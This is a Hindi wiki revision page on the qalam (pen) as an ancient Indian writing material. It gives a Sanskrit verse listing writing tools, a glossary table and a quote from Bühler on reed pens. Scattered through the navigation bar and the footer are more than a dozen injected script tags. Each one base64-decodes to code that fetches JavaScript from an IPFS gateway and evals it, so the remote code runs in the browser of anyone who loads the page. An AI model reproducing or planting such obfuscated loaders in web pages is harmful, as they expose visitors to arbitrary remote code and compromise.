Difference between revisions of "क़लम (लेखन सामग्री)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(10 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[चित्र:Lekhan-Samagri-17.jpg|thumb|हाथ-[[काग़ज़]], दवात औत कलम, 18वीं सदी ([[केलकर संग्रहालय पुणे|केळकर संग्रहालय]], [[पुणे]])]]
+
{{लेखन सामग्री विषय सूची}}
[[प्राचीन भारत लेखन सामग्री|प्राचीन भारत की लेखन सामग्री]] में कलम एक लेखन सामग्री के रूप में प्रयोग होती थी।
+
{| class="bharattable" align="right" style="margin:10px; text-align:center"
 +
|+ <small>क़लम</small>
 +
|-
 +
| [[चित्र:Lekhan-Samagri-17.jpg|हाथ-काग़ज़, दवात औत क़लम|150px|center]]
 +
|-
 +
|<small>हाथ-[[काग़ज़]], दवात औत क़लम, <br />18वीं सदी ([[केलकर संग्रहालय पुणे|केळकर संग्रहालय]], [[पुणे]])</small>
 +
|-
 +
| [[चित्र:Kalam-Buddaka.jpg|क़लम और बुद्दका|200px|center]]
 +
|-
 +
|<small>क़लम और बुद्दका</small>
 +
|-
 +
| [[चित्र:Quill-And-Inkpot.jpg|क़लम और स्याही|200px|center]]
 +
|-
 +
|<small>क़लम और [[स्याही (लेखन सामग्री)|स्याही]]</small>
 +
|-
 +
| [[चित्र:Old-Quill-Set.jpg|क़लम (लेखन सामग्री)|200px|center]]
 +
|-
 +
|<small>क़लम (लेखन सामग्री)</small>
 +
|-
 +
| [[चित्र:Quill-And-Inkpot-1.jpg|क़लम और स्याही|200px|center]]
 +
|-
 +
|<small>क़लम और [[स्याही (लेखन सामग्री)|स्याही]]</small>
 +
|}
  
[[संस्कृत भाषा|संस्कृत]] का एक श्लोक है, जिसमें लेखन के लिए आवश्यक उपकरणों की जानकारी दी गई है। विशेष बात यह है कि इस श्लोक में जिन उपकरणों को गिनाया गया है, उनमें से एक का नाम ‘क’ से आरम्भ होता है।  
+
[[प्राचीन भारत लेखन सामग्री|प्राचीन भारत की लेखन सामग्री]] में क़लम एक लेखन सामग्री के रूप में प्रयोग होती थी। [[संस्कृत भाषा|संस्कृत]] का एक श्लोक है, जिसमें लेखन के लिए आवश्यक उपकरणों की जानकारी दी गई है। विशेष बात यह है कि इस श्लोक में जिन उपकरणों को गिनाया गया है, उनमें से एक का नाम ‘क’ से आरम्भ होता है।  
 
<poem>
 
<poem>
 
कुम्पी कज्जल केश कम्बलमहो मध्ये शुभ्रं कुशम्,
 
कुम्पी कज्जल केश कम्बलमहो मध्ये शुभ्रं कुशम्,
Line 8: Line 30:
 
कीकी कोटरि कल्मदान क्रमणेः तथा कांकरो,
 
कीकी कोटरि कल्मदान क्रमणेः तथा कांकरो,
 
एतै रम्यककाक्षरैश्च सहितः शास्त्रं च नित्यं लिखेत्।।</poem>
 
एतै रम्यककाक्षरैश्च सहितः शास्त्रं च नित्यं लिखेत्।।</poem>
{| class="bharattable" border="1"
+
{| class="bharattable-purple" border="1"
 
|+उपकरणों के अर्थ
 
|+उपकरणों के अर्थ
 
|-
 
|-
Line 33: Line 55:
 
|-
 
|-
 
| कल्म
 
| कल्म
| कलम
+
| क़लम
 
|-
 
|-
 
| कृपाणिका
 
| कृपाणिका
Line 54: Line 76:
 
|-
 
|-
 
| कल्मदान
 
| कल्मदान
| कलम, चाकू, रेखनी आदि रखने का बक्सा
+
| क़लम, चाकू, रेखनी आदि रखने का बक्सा
 
|-
 
|-
 
| कटि
 
| कटि
Line 66: Line 88:
 
|}
 
|}
  
इन 17 वस्तुओं में से काग़ज़, [[भूर्जपत्र (लेखन सामग्री)|भूर्जपत्र]], [[ताड़पत्र (लेखन सामग्री)|ताड़पत्र]] आदि की विस्तृत चर्चा मिलती  है। अब प्रमुखतः कलम और [[स्याही (लेखन सामग्री)|स्याही]] का प्रयोग होता है ।  
+
इन 17 वस्तुओं में से [[काग़ज़]], [[भूर्जपत्र (लेखन सामग्री)|भूर्जपत्र]], [[ताड़पत्र (लेखन सामग्री)|ताड़पत्र]] आदि की विस्तृत चर्चा मिलती  है। अब प्रमुखतः क़लम और [[स्याही (लेखन सामग्री)|स्याही]] का प्रयोग होता है ।  
 
==नरकुल==
 
==नरकुल==
नरकुल या लकड़ी से बनी कलम और रेशों से बनी कूची को ‘लेखनी’ कहते थे। जी. ब्यूह्लर अपनी पुस्तक ‘भारतीय लिपिशास्त्र’ में लिखते हैं-<br /><blockquote><span style="color: #8f5d31">लिखने के लिए प्रयुक्त होने वाले उपकरण का सामान्य नाम ‘लेखनी’ था। ‘लेखनी’ का प्रयोग शलाका, तूलिका, वर्णवर्तिका और वर्णिका, सभी के लिए होता था। ‘लेखनी’ शब्द महाकाव्यों में उपलब्ध है। नरकुल या नरसल से बनी लेखनी को आमतौर पर कलम कहते थे, मगर इस शब्द की व्युपत्ति स्पष्ट नहीं है। कलम के लिए देशी संस्कृत नाम ‘इषीका’ या ‘ईषिका’ था, जिसका शब्दार्थ है, नरकुल। नरकुल, बाँस या लकड़ी के टुकड़ों को हमारी आज की (यानी आज से क़रीब सौ साल पहले की) कलमों की तरह बनाकर उनसे लिखने की सारे भारत में प्रथा रही है। ताड़पत्र और भूर्जपत्र पर लिखी गई सारी उपलब्ध हस्तलिपियाँ इसी तरह की कलमों से लिखी गई हैं। '''जी. ब्यूह्लर'''</span></blockquote>
+
नरकुल या लकड़ी से बनी क़लम और रेशों से बनी कूची को ‘लेखनी’ कहते थे। जी. ब्यूह्लर अपनी पुस्तक ‘भारतीय लिपिशास्त्र’ में लिखते हैं-<br /><blockquote><span style="color: #8f5d31">लिखने के लिए प्रयुक्त होने वाले उपकरण का सामान्य नाम ‘लेखनी’ था। ‘लेखनी’ का प्रयोग शलाका, तूलिका, वर्णवर्तिका और वर्णिका, सभी के लिए होता था। ‘लेखनी’ शब्द महाकाव्यों में उपलब्ध है। नरकुल या नरसल से बनी लेखनी को आमतौर पर क़लम कहते थे, मगर इस शब्द की व्युपत्ति स्पष्ट नहीं है। क़लम के लिए देशी संस्कृत नाम ‘इषीका’ या ‘ईषिका’ था, जिसका शब्दार्थ है, नरकुल। नरकुल, बाँस या लकड़ी के टुकड़ों को हमारी आज की (यानी आज से क़रीब सौ साल पहले की) क़लमों की तरह बनाकर उनसे लिखने की सारे भारत में प्रथा रही है। ताड़पत्र और भूर्जपत्र पर लिखी गई सारी उपलब्ध हस्तलिपियाँ इसी तरह की क़लमों से लिखी गई हैं। '''जी. ब्यूह्लर'''</span></blockquote>
 
==शलाका==
 
==शलाका==
दक्षिण [[भारत]] में ताड़पत्र पर अक्षर उकेरने के लिए लोहे से बनी जिस नुकीली लेखनी का उपयोग होता था, उसे संस्कृत में 'शलाका' कहते हैं। बाद में इन अक्षरों में कोयले का चूर्ण या काजल भर दिया जाता था। प्राचीन काल में विद्यार्थी लकड़ी के पाटों पर गोल तीखे मुख की जिस कलम से लिखते थे, उसे 'वर्णक' या 'वर्णिका' कहते थे। रंगीन कलमों को 'वर्णवर्तिका' कहते थे और कूची को 'तूलि' या 'तूलिका' कहा जाता था।
+
दक्षिण [[भारत]] में ताड़पत्र पर अक्षर उकेरने के लिए [[लोहा|लोहे]] से बनी जिस नुकीली लेखनी का उपयोग होता था, उसे [[संस्कृत]] में 'शलाका' कहते हैं। बाद में इन अक्षरों में कोयले का चूर्ण या काजल भर दिया जाता था। प्राचीन काल में विद्यार्थी लकड़ी के पाटों पर गोल तीखे मुख की जिस क़लम से लिखते थे, उसे 'वर्णक' या 'वर्णिका' कहते थे। रंगीन क़लमों को 'वर्णवर्तिका' कहते थे और कूची को 'तूलि' या 'तूलिका' कहा जाता था।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 80: Line 101:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{प्राचीन भारत लेखन सामग्री}}
 
{{प्राचीन भारत लेखन सामग्री}}
[[Category:इतिहास_कोश]][[Category:भाषा_और_लिपि]]
+
[[Category:इतिहास_कोश]][[Category:भाषा और लिपि]][[Category:भाषा कोश]]
 
[[Category:प्राचीन भारत लेखन सामग्री]]
 
[[Category:प्राचीन भारत लेखन सामग्री]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 06:07, 26 May 2012

lekhan samagri vishay soochi
lekhan samagri   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> pashaniy shilalekh   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> eeant   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> svarn   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> rajat   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> kashth   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> kap da   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> dhatu   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> ta dapatr   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> bhoorjapatr   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> agarupatr   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> kagaz   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> qalam   <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> syahi
qalam
hath-kagaz, davat aut qalam|150px|center
hath-kagaz, davat aut qalam,
18vian sadi (keळkar sangrahalay, pune)
qalam aur buddaka|200px|center
qalam aur buddaka
qalam aur syahi|200px|center
qalam aur syahi
qalam (lekhan samagri)|200px|center
qalam (lekhan samagri)
qalam aur syahi|200px|center
qalam aur syahi

prachin bharat ki lekhan samagri mean qalam ek lekhan samagri ke roop mean prayog hoti thi. sanskrit ka ek shlok hai, jisamean lekhan ke lie avashyak upakaranoan ki janakari di gee hai. vishesh bat yah hai ki is shlok mean jin upakaranoan ko ginaya gaya hai, unamean se ek ka nam ‘k’ se arambh hota hai.

kumpi kajjal kesh kambalamaho madhye shubhran kushamh,
kambi kalm kripanika katarani kashthan tathh kagalamh.
kiki kotari kalmadan kramaneah tatha kaankaro,
etai ramyakakaksharaishch sahitah shastran ch nityan likheth..

upakaranoan ke arth
upakaran arth
kumpi davat
kajjal kajal
kesh bal
kambal -
kush pavitr mani jane vali ek ghas
kambi rekhani, roolar
kalm qalam
kripanika chakoo
katarani kaianchi
kashth lak di ki takhti
kamalamh kagaz
kiki aankhean
kotari chhoti kothari
kalmadan qalam, chakoo, rekhani adi rakhane ka baksa
kati kamar
kaankar chhota kank d
kraman pair

in 17 vastuoan mean se kagaz, bhoorjapatr, ta dapatr adi ki vistrit charcha milati hai. ab pramukhatah qalam aur syahi ka prayog hota hai .

narakul

narakul ya lak di se bani qalam aur reshoan se bani koochi ko ‘lekhani’ kahate the. ji. byoohlar apani pustak ‘bharatiy lipishastr’ mean likhate haian-

likhane ke lie prayukt hone vale upakaran ka samany nam ‘lekhani’ tha. ‘lekhani’ ka prayog shalaka, toolika, varnavartika aur varnika, sabhi ke lie hota tha. ‘lekhani’ shabd mahakavyoan mean upalabdh hai. narakul ya narasal se bani lekhani ko amataur par qalam kahate the, magar is shabd ki vyupatti spasht nahian hai. qalam ke lie deshi sanskrit nam ‘ishika’ ya ‘eeshika’ tha, jisaka shabdarth hai, narakul. narakul, baans ya lak di ke tuk doan ko hamari aj ki (yani aj se qarib sau sal pahale ki) qalamoan ki tarah banakar unase likhane ki sare bharat mean pratha rahi hai. ta dapatr aur bhoorjapatr par likhi gee sari upalabdh hastalipiyaan isi tarah ki qalamoan se likhi gee haian. ji. byoohlar

shalaka

dakshin bharat mean ta dapatr par akshar ukerane ke lie lohe se bani jis nukili lekhani ka upayog hota tha, use sanskrit mean 'shalaka' kahate haian. bad mean in aksharoan mean koyale ka choorn ya kajal bhar diya jata tha. prachin kal mean vidyarthi lak di ke patoan par gol tikhe mukh ki jis qalam se likhate the, use 'varnak' ya 'varnika' kahate the. rangin qalamoan ko 'varnavartika' kahate the aur koochi ko 'tooli' ya 'toolika' kaha jata tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh